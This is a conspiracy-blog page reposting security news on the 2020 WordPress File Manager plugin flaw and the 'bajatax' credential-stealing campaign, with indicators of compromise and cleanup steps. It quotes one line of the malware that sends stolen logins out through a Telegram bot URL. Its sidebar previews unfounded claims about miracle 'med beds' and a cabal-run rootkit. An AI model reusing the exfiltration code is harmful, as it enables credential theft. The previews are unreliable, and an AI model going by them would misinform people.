Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird.

 Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird.

 Publiziert am 28. September 2020 von _ADMIN_

 Conspiracy Revelation: 28.9.2020: Linguistische Korrektur..

 “Angriffe auf Websites, auf denen eine anfällige Version des Dateimanager-Plugins ausgeführt wird durch HTH_Editors | September 11, 2020 | 0 Kommentare WordPress Plugin, WordPress-Sicherheit

 Sicherheitsforscher haben kürzlich eine Sicherheitsanfälligkeit in einem Dateimanager-Plugin gemeldet, was anfangs mehr gefährdete als 700,000 WordPress-Sites. jedoch, in ein paar Tagen, die Anzahl der angegriffenen Standorte erreicht 2.6 Million.

 Mehrere Angreifer, die die Sicherheitsanfälligkeit des Dateimanager-Plugins ausnutzen.

 Laut Wordfence Forscher sind mehrere Bedrohungsakteure Schuld für diese Angriffe. Zwei spezifische Bedrohungsakteure sind bei den Exploits am erfolgreichsten.

 Es scheint, dass diese Angreifer jetzt Kennwörter schützen, das anfällige Kopien einer bestimmten Datei schützt…

 Der aktivste dieser Angreifer wurde als “Bajatax” identifiziert. Das Unternehmen hat zuvor Anmeldeinformationen von PrestaShop-Websites gestohlen. Zu den von den Forschern entdeckten Kompromissindikatoren gehören einfache Dateien, die die “Bajatax”

 Zeichenfolge beinhalten und Änderungen an der ursprünglichen anfälligen Datei connector.minimal.php durrchführt. Die letztere Datei soll alle anderen potenziellen Angreifer ausschließen. Die Forscher-Entdeckungen weisen darauf hin,

 dass diese Dateien von einigen der aktivsten IP-Adressen verwendet werden, die bei den Angriffen eingesetzt wurden.

 Infizierten Websites wird bösartiger Code hinzugefügt. Dieser Code verwendet die API von Telegram, um die Anmeldeinformationen aller Benutzer zu filtern, die sich bei der gefährdeten Site anmelden.

 In Ergänzung, Der gleiche Code wird auch zur Datei user.php hinzugefügt, bei der es sich um eine WordPress-Kerndatei handelt.

 Der zweite Angreifer, der die Sicherheitsanfälligkeit des Dateimanagers mit großem Erfolg ausnutzt, lässt einen bestimmten Infektor fallen,..index.php, mit einem MD5-Hash … und eine von diesem Infektor eingefügte Hintertür. Wordfence sagt

 im offiziellen Bericht. Dieser Angreifer schützt auch die Datei … mit einem Kennwort, um zu versuchen, andere Bedrohungsakteure auszusperren.

 Die Forscher skizzieren auch, dass die von diesem zweiten Schauspieler verwendete Hintertür seit vielen Jahren verwendet wird. jedoch, Mehrere Kopien davon können auf eine einzelne infizierte Site verteilt werden,

 Dies führt zu Persistenz, wenn kein Schutz vorhanden ist.

 Außerdem, Sobald die Hintertüren erfolgreich installiert wurden nutzt der Angreifer sie sicherlich, um weitere Änderungen an den WordPress-Kerndateien vorzunehmen.

 Was sollten Sie tun, wenn Sie eine anfällige Version des Dateimanager-Plugins verwendet haben??

 Der beste Sicherheitshinweis ist die Verwendung eines Sicherheitstools zum Scannen Ihrer Website nach Malware. Falls Sie feststellen, dass Ihre Website durch die in diesem Artikel beschriebenen Angriffe gefährdet wurde,

 sollten Sie in Betracht ziehen Ihre Website zu bereinigen, bevor Sie etwas anderes tun.

 Wenn Sie Eigentümer einer E-Commerce-Website sind, sollten Sie auch alle Ihre Benutzer kontaktieren,

 lassen Sie sie wissen, dass Ihre Anmeldeinformationen möglicherweise kompromittiert wurden. Sie können die Gesamtsicherheit ihrer Website auch anhand der Tipps testen, die wir im folgenden Artikel bereitgestellt haben:

 Lesen Sie auch So testen Sie die Sicherheit Ihrer WordPress-Site”

 Quelle: https://howtohosting.guide/de/attacks-against-sites-running-vulnerable-file-manager-plugin/ (Autoübersetzung nach DE fehlerkorrigiert /(Translation-I.V.)

 Post Views: 200

 Dieser Beitrag wurde unter Allgemein, Alliance/Ermächtigung/Empower, Chaos & Karma, Corrupted Software/Microsoft etc., Counterdefense/Cyberterror-Morons, Detection, Implants, Intelligence/Surveillance/Sabotage, IT Security/IT Forensic, Kabbale/Cabal, Mafia&State Crime, News, Protection, Public Counterintelligence veröffentlicht.

 https://conspiracyrevelation.com/2020/09/28/angriffe-auf-websites-auf-denen-eine-anfaellige-version-des-dateimanager-plugins-ausgefuehrt-wird/ [70349]

___________________________________________________________________________________________________________

WordPress malware using the Telegram API

 Publiziert am 28. September 2020 von _ADMIN_

 “WordPress malware using the Telegram API”

 “Panos Kesisis · 01st September 2020·Wordpress, PHP, Website Security”

 Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…

 “wp_ajax_try_2020_v2”

 “file_get_contents(“https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=” . urlencode$”

 “The malware looks to be infecting WordPress’ core files, “File Manager” and “WooCommerce” plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:

 wp-includes/user.php

 wp-admin/admin-ajax.php

 wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)

 woocommerce/includes/wc-user-functions.php

 woocommerce/includes/class-wc-form-handler.php

 Expressions that can help to determine if your site is compromised are:

 “bajatax”

 “api.telegram.org”

 Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.

 Steps to resolve

 Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.

 Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).

 Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.

 …

 Source: https://fixed.net/blog/wordpress-malware-using-the-telegram-api

 Join @conspiracyrevelation on Telegram

 Dieser Beitrag wurde unter Allgemein, Alliance/Ermächtigung/Empower, Chaos & Karma, Corrupted Software/Microsoft etc., Counterdefense/Cyberterror-Morons, Detection, Implants, Intelligence/Surveillance/Sabotage, IT Security/IT Forensic,

 Kabbale/Cabal, Mafia&State Crime, News, Protection, Public Counterintelligence veröffentlicht.

 https://conspiracyrevelation.com/2020/09/28/wordpress-malware-using-the-telegram-api/

 As always, we’re here to help in case you need any assistance with cleaning your website and implementing additional security measures. If your site has been infected, feel free to contact us and we can help ASAP.

 Also, make sure to follow us on twitter for future updates. ” [70350]

Hacker-Krieg um 300.000 gefährdete WordPress-Sites

 Publiziert am 28. September 2020 von _ADMIN_

 “Cybercrime”

 ”Bastivon Basti11. September 2020

 Vor einigen Tagen wurde eine schwerwiegende Sicherheitslücke im File Manager-Plugin für WordPress entdeckt. Obwohl die Lücke vom Entwickler innerhalb weniger Stunden behoben und mit Erscheinen von Version 6.9

 ein Update zur Verfügung stand, wurde das Update nicht von allen Nutzern eingespielt. Das hat nun dazu geführt, dass einige Hacker um die Kontrolle von etwa 300.000 infizierten WordPress-Seiten kämpfen.

 Warum viele Nutzer des File Manager-Plugins kein Update eingespielt haben, ist unklar. Einige Nutzer haben das Plugin zwar entfernt (ursprünglich waren es 700.000, nun sind noch 600.000 Installationen),

 bei einem Teil dürfte es sich um vergessene oder nicht mehr gepflegte WordPress-Installationen handeln, aber ein Teil der Nutzerschaft hat eben kein Update durchgeführt.

 Wie Bleeping Computer gestern berichtete, werden derzeit über 2,6 Millionen WordPress-Installationen von unterschiedlichen Hackern angegriffen. So wie es derzeit aussieht, gibt es zwei Hauptakteure,

 die in dem Rennen um die Kontrolle die Nase vorne haben. Während einer Backdoors einbaut, versucht ein Anderer fremde Exloit-Versuche andere Angreifer zu blockieren,

 während er selbst erfolgreich Benutzerzugangsdaten klaut. Der Hacker ist unter dem Namen Bajatax bekannt.

 In all, Defiant’s researchers saw attacks trying to exploit this vulnerability originating from more than 370,000 separate IP addresses, with almost no overlap in backdoor access activity.

 Wenn sich die Aktivitäten beim Zugriff auf Backdoors nicht überschneiden, spricht das eher für abgestimmte Aktionen oder gar den gleichen Täter.

 Das ist ein schönes Beispiel dafür, was passieren kann, wenn Sicherheitsupdates nicht zeitnah eingespielt werden. Diese Lücke im File Manager-Plugin, bzw. die nicht eingespielten Updates,

 wird WordPress-Betreiber und auch Hoster noch länger beschäftigen.

 Weitere ausführliche Informationen zu den Aktivitäten der Hacker hat Wordfence veröffentlicht.”

 Quelle: https://netzbasti.de/2020/09/11/hacker-krieg-um-300-000-gefaehrdete-wordpress-sites/

 Dieser Beitrag wurde unter Allgemein, Chaos & Karma, Counterdefense/Cyberterror-Morons, Detection, Implants, Intelligence/Surveillance/Sabotage, IT Security/IT Forensic, Mafia&State Crime,

 News, Protection, Public Counterintelligence veröffentlicht.

 https://conspiracyrevelation.com/2020/09/28/hacker-krieg-um-300-000-gefaehrdete-wordpress-sites/[70351]

Attacks Targeting Recent WordPress File Manager Flaw Ramping Up

 Publiziert am 28. September 2020 von _ADMIN_

 By Ionut Arghire on September 11, 2020

 Attacks targeting a recently addressed vulnerability in the WordPress plugin File Manager are ramping up, warns the Wordfence Threat Intelligence team at WordPress security company Defiant.

 With over 700,000 active installs, File Manager is a highly popular WordPress plugin that provides admins with file and folder management capabilities (copy/paste, delete, download/upload, edit, and archive).

 In early September 2020, the plugin’s developer addressed a critical-severity zero-day flaw that was already being actively targeted. Assessed with a CVSS score of 10,

 the flaw can allow attackers to remotely execute code on a vulnerable installation.

 The issue is related to code taken from the elFinder project, with the File Manager developers renaming the elFinder library’s connector.minimal.php.dist file to .php, to have it execute directly.

 This, however, opened the plugin to attackers.

 Nearly two weeks after a patch for the vulnerability was released, multiple threat actors are targeting unpatched installations, Wordfence researchers reveal.

 Within days after the zero-day was patched, attackers were targeting over 1.7 million sites, but that number increased to 2.6 million as of September 10.

 “We’ve seen evidence of multiple threat actors taking part in these attacks, including minor efforts by the threat actor previously responsible for attacking millions of sites,

 but two attackers have been the most successful in exploiting vulnerable sites, and at this time, both attackers are password protecting vulnerable copies of the ....mini...php file,” Wordfence notes.

 The most active of the attackers is a Moroccan threat actor referred to as “bajatax,” which modifies the vulnerable connector.minimal.php file to prevent further attacks.

 This is the first threat actor observed targeting the vulnerability at scale.

 Once it manages to compromise a website, the attacker adds code to exfiltrate user credentials using the Telegram messenger’s API. The code is added to the WordPress core user.php file and,

 if WooCommerce is installed, two more files are modified to steal user credentials.

 A second adversary targeting the security flaw is attempting to inject a backdoor into the vulnerable websites, and is protecting the connector.minimal.php file with a password, in an attempt

 to prevent other infections. However, it appears that the threat actor is using a consistent password across infections.

 Two copies of the backdoor are inserted into the infected website, one in the webroot and the other in a randomized writable folder, likely in an attempt to ensure persistence.

 The attacker leverages the backdoors to modify core WordPress files which would then be abused for monetization purposes, based on the threat actor’s previously observed modus operandi.

 On many of the compromised websites, Wordfence discovered malware from multiple adversaries. Attacks targeting the vulnerability were observed originating from more than 370,000 separate IP addresses,

 with almost no overlaps between the IPs used by the two most active attackers.

  “As more and more users update or remove the File Manager plugin, control of any infected sites will likely be split between these two threat actors,” Wordfence notes.

 Site administrators are advised to update the File Manager plugin as soon as possible, but also to scan their website for possible compromise and to remove any malicious code they might find.

 Related: WordPress ‘File Manager’ Plugin Patches Critical Zero-Day Exploited in Attacks

 Related: WordPress Malware Targets WooCommerce Stores

 Related: Hackers Can Inject Code Into WordPress Sites via Flaw in Product Review Plugin”

 Source: https://www.securityweek.com/attacks-targeting-recent-wordpress-file-manager-flaw-ramping

 Dieser Beitrag wurde unter Chaos & Karma, Counterdefense/Cyberterror-Morons, Detection, Endgame/Endzeit/Endtimes, Implants, Intelligence/Surveillance/Sabotage, IT Security/IT Forensic,

 Kabbale/Cabal, Mafia&State Crime, News, Protection, Public Counterintelligence, Sociology/Soziologie veröffentlicht.

 https://conspiracyrevelation.com/2020/09/28/attacks-targeting-recent-wordpress-file-manager-flaw-ramping-up/ [70352]


Kommentare

Kommentar veröffentlichen

Beliebte Posts aus diesem Blog

Heil-Technologien – Unsere Gesundheits-Zukunft kommt bald mit dem MED-BETT / Rekord-Thema von conspiracyrevelation

Bild
 Heil-Technologien – Unsere Gesundheits-Zukunft kommt bald mit dem MED-BETT  Publiziert am 2. Juli 2020 von _ADMIN_  “Heil-Technologien – Unsere Gesundheits-Zukunft kommt bald mit dem MED-BETT”  (Conspiracy Revelation: 4.7.2020: Massives Korrektur und Stil-Update. (2020)(18.7.))  [“TRUMP sagte am 14. Juni der Nation: „Innerhalb eines Jahres oder so werden fast alle Krankenhausverfahren veraltet sein.“   Jede Stadt wird viele medizinische Betten und Tesla-Kammern haben, die in der Lage sind, DNA zu heilen und zu reparieren, während alle Krankheiten geheilt werden.” (unüberprüft)]  “ALTERSREGRESSION (bis zu 30 Jahre)   KEIN KREBS MEHR   KEIN AUTISMUS MEHR   KEINE FIBROMYALGIE MEHR   KEINE NOTWENDIGKEIT FÜR IMPFSTOFFE   NICHT MEHR ALZHEIMER   KEINE ALLGEMEINEN SCHMERZEN MEHR   KEINE MÄNGEL MEHR”   “(Möglicherweise ist nicht jeder mit allem einverstanden, was er tut, aber Trump tut mehr für die Menschheit, als die l...
Mehr anzeigen

The Snake-Subversion-CMOS.Rootkit.Virus and Zombiehost is complex.... (2017)

  3.3.2017: #TheReal_S_Conspiracy.   /  The Snake-Subversion-CMOS.Rootkit.Virus and Zombiehost is complex....  It exists for decades in Computer Systems....I know it and analyze it for 12-13 years know (basically since and before Antikeymagic was born as chaoskarmic Antidote)...but its first unmistakably attack started when they remotely destroyed a western digital harddisk that goes back as far as into the year 1998. It is the essential system for global digital take over...a big part of Skynet...Surely all Agencies and the Ruling Shadow Governments and GOG Ruling Crime Cabal are deeply involved.  It even surveils police stations and medical doctors.  It is an integral part of the sabotage actions of Facebook aka FraudBug.  It manipulates TIME/DATE / Time Machine effect in Harddisks.  It uses its own crypto-language.  It manipulates all Operating Systems.  It communicates through Pictures and Stealth UDP/TCP Packets..  It comm...
Mehr anzeigen